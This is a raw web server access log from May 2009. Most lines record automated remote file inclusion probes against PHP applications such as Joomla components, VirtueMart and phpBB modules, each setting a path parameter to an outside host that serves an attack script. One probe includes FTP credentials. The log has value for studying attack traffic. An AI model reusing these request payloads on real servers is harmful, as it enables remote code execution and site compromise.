201.232.54.48 - - [08/May/2009:00:41:39 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
201.232.54.48 - - [08/May/2009:00:41:39 -0400] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
201.232.54.48 - - [08/May/2009:00:41:39 -0400] "GET /logs/access_log.Q108112300//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://indoirc.go.ro/id1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
69.89.31.105 - - [08/May/2009:00:41:39 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.812"
211.115.213.66 - - [08/May/2009:00:41:46 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:00:41:46 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:00:41:46 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
211.115.213.66 - - [08/May/2009:00:41:48 -0400] "GET /logs/access_log.Q108122500//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
61.19.241.61 - - [08/May/2009:00:41:53 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:00:41:53 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 257 "-" "libwww-perl/5.811"
61.19.241.61 - - [08/May/2009:00:41:53 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
88.84.128.40 - - [08/May/2009:00:42:01 -0400] "GET /logs/access_log.Q108122400//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:00:42:02 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
88.84.128.40 - - [08/May/2009:00:42:02 -0400] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
69.89.31.105 - - [08/May/2009:00:42:29 -0400] "GET /logs/access_log.Q108122800//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.812"
74.6.8.112 - - [08/May/2009:00:43:02 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
88.84.128.40 - - [08/May/2009:00:43:02 -0400] "GET /logs/access_log.Q108122800//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://parabill.net/cerberus/cerberus-gui/MADONGCMD.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.803"
74.6.8.112 - - [08/May/2009:00:43:03 -0400] "GET /logs/error_log.Q108042100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.239.76.25 - - [08/May/2009:00:43:10 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:43:10 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:43:10 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:43:10 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:43:10 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:43:10 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:43:14 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:43:14 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:43:14 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:43:15 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:43:15 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:43:15 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:43:20 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:43:21 -0400] "GET /logs/access_log.Q108091400/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:00:43:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.239.76.25 - - [08/May/2009:00:43:36 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:43:36 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:43:36 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:43:37 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:43:37 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:43:37 -0400] "GET /logs/access_log.Q108110900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:43:39 -0400] "GET /logs/access_log.Q108122500//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:43:39 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:43:39 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:43:39 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:00:43:54 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.20.225.45 - - [08/May/2009:00:43:55 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
222.239.76.25 - - [08/May/2009:00:43:57 -0400] "GET /logs/error_log.Q108100300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:44:35 -0400] "GET /logs/error_log.Q108100300%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:00:44:40 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
66.197.202.64 - - [08/May/2009:00:45:05 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:45:05 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:45:05 -0400] "GET /logs/access_log.Q108061400/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:45:32 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:00:45:32 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:00:45:32 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
222.239.76.25 - - [08/May/2009:00:45:37 -0400] "GET /logs/access_log.Q109042500//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
62.116.168.108 - - [08/May/2009:00:45:38 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:00:45:38 -0400] "GET /logs/access_log.Q108061400/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
62.116.168.108 - - [08/May/2009:00:45:38 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:45:44 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:45:44 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.239.76.25 - - [08/May/2009:00:45:44 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:45:44 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:45:44 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:45:44 -0400] "GET /logs/access_log.Q108110900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:00:45:47 -0400] "GET /logs/access_log.Q108110900//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
222.239.76.25 - - [08/May/2009:00:45:49 -0400] "GET /logs/access_log.Q108122500/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://nbf.com.tw/lang/fatal1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
58.227.193.198 - - [08/May/2009:00:45:49 -0400] "GET /logs/access_log.Q108122500/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.laxestereo.com/proserv/copyright.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
61.19.241.61 - - [08/May/2009:00:46:16 -0400] "GET /logs/access_log.Q108110900//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=ftp://deals:qwerty831@72.9.152.46/public_html/v6id.txt??%0D?? HTTP/1.1" 404 284 "-" "libwww-perl/5.811"
222.239.76.25 - - [08/May/2009:00:46:18 -0400] "GET /logs/access_log.Q109030200//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
66.249.72.114 - - [08/May/2009:00:46:18 -0400] "GET /images/items/store_xray_section.jpg HTTP/1.1" 200 8861 "-" "Googlebot-Image/1.0"
66.197.202.64 - - [08/May/2009:00:46:25 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:46:25 -0400] "GET /logs/access_log.Q109030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:46:25 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:46:29 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:46:29 -0400] "GET /logs/access_log.Q109030500%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.197.202.64 - - [08/May/2009:00:46:29 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:46:32 -0400] "GET /logs/access_log.Q108090400%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:00:46:53 -0400] "GET /logs/access_log.Q108100400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
195.20.225.45 - - [08/May/2009:00:46:54 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 216 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.110.19.178 - - [08/May/2009:00:47:11 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:00:47:11 -0400] "GET /logs/?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 200 480 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:00:47:11 -0400] "GET /?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
195.20.225.45 - - [08/May/2009:00:47:34 -0400] "GET /logs/access_log.Q108102500//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.stockphotosharing.com/Themes/Images/users_raw/id.txt?? HTTP/1.1" 404 243 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
211.110.19.178 - - [08/May/2009:00:47:38 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
211.110.19.178 - - [08/May/2009:00:47:38 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://pallmall11.fileave.com/id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:48:30 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:48:30 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:48:30 -0400] "GET /logs/access_log.Q108061400/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [08/May/2009:00:48:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.116.178.20 - - [08/May/2009:00:48:31 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:48:32 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
122.116.178.20 - - [08/May/2009:00:48:32 -0400] "GET /logs/access_log.Q108061400/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.254.231.239 - - [08/May/2009:00:48:38 -0400] "GET /logs/access_log.Q108110900%20%20//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://masterpule.100webspace.net/id1.txt?? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
74.6.8.112 - - [08/May/2009:00:48:43 -0400] "GET /logs/error_log.Q107103100 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
210.68.188.206 - - [08/May/2009:00:49:14 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.68.188.206 - - [08/May/2009:00:49:15 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
66.197.202.64 - - [08/May/2009:00:49:19 -0400] "GET /logs/access_log.Q108060100%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:00:49:42 -0400] "GET /logs/access_log.Q109042500//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
210.68.188.206 - - [08/May/2009:00:49:48 -0400] "GET /logs//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.68.188.206 - - [08/May/2009:00:49:48 -0400] "GET //include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 225 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
210.68.188.206 - - [08/May/2009:00:49:48 -0400] "GET /logs/access_log.Q108081700//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.6.8.112 - - [08/May/2009:00:49:53 -0400] "GET /ACE.html HTTP/1.0" 200 5877 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.197.202.64 - - [08/May/2009:00:49:54 -0400] "GET /logs/access_log.Q108061400%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://fst.upsi.edu.my/mambots/editors/id.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.68.188.206 - - [08/May/2009:00:49:59 -0400] "GET /logs/access_log.Q109042500//include//functions.inc.php?REX[INCLUDE_PATH]=http://xlab.cn.nctu.edu.tw//modules/xoopsgallery/id1.txt??%0D? HTTP/1.1" 404 252 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
74.6.8.112 - - [08/May/2009:00:50:18 -0400] "GET /logs/access_log.Q108050400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.112 - - [08/May/2009:00:50:33 -0400] "GET /logs/access_log.Q108030700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
